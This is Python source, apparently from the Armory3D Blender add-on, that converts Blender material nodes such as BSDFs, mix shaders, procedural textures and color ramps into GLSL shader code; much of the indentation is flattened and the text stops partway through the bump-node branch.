def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
    if output_node is not None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
    particle_info = {
        'index': False,
        'age': False,
        'lifetime': False,
        'location': False,
        'size': False,
        'velocity': False,
        'angular_velocity': False,
    }
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
        if rpdat.arm_rp_displacement == 'Tessellation' and tese is not None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
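# Note: parse_output above writes the surface channels into the fragment
# shader and, when displacement is enabled, emits 'vec3 disp' into either the
# vertex shader or the tessellation-evaluation shader.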
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
    if output_node is None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
    if inp.type == 'SHADER':
        return parse_shader_input(inp)
    elif inp.type in ('RGB', 'RGBA', 'VECTOR'):
        return parse_vector_input(inp)
    elif inp.type == 'VALUE':
        return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
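# Each shader parse returns a 7-tuple of GLSL expressions in the order
# (basecol, roughness, metallic, occlusion, specular, opacity, emission);
# the defaults above are the neutral PBR values used for unlinked sockets.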
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
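        # Blend the two shader inputs per channel as a linear interpolation:
        # out = in1 * (1 - fac) + in2 * fac.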
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
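        # For an additive combine, base colors are summed while the scalar
        # channels are averaged with equal 0.5 weights.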
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
            # clearcoat_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
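# The parse_*_input helpers below turn a node input socket into a GLSL
# expression string: linked sockets are resolved through write_result()
# (REROUTE nodes are chased recursively), unlinked sockets fall back to the
# socket's default value or a batched uniform. Illustrative sketch of the
# fragment code this family emits for a Mix node driven by a checker
# texture (names abbreviated):
#   float Mix_Fac_res = tex_checker_f(bposition, 5.0);
#   vec3 Mix_Color_res = mix(col1_expr, col2_expr, Mix_Fac_res);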
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
        curshader.add_function(c_functions.str_tex_noise)
        assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
        assets_add_embedded_data('noise256.png')
        curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
        # Slow: three separate noise evaluations per sample
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
            out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))))'.format(col1, col2, fac_var)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
        # Evaluated at export time, so the temperature input must be a
        # constant -- float() would fail on a linked (generated) expression
        t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
        if t >= 12000:
            rgb[0] = 0.826270103
            rgb[1] = 0.994478524
            rgb[2] = 1.56626022
        elif t < 965.0:
            rgb[0] = 4.70366907
            rgb[1] = 0.0
            rgb[2] = 0.0
        else:
            if t >= 6365.0:
                i = 5
            elif t >= 3315.0:
                i = 4
            elif t >= 1902.0:
                i = 3
            elif t >= 1449.0:
                i = 2
            elif t >= 1167.0:
                i = 1
            else:
                i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
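    # ColorRamp sketch (illustrative): the index above is computed as a
    # branchless sum of comparisons, e.g. for stops at 0.0 and 0.5:
    #   int ramp_i = 0 + (fac > 0.5 ? 1 : 0);
    #   col = mix(cols[ramp_i], cols[ramp_i + 1], ...);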
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
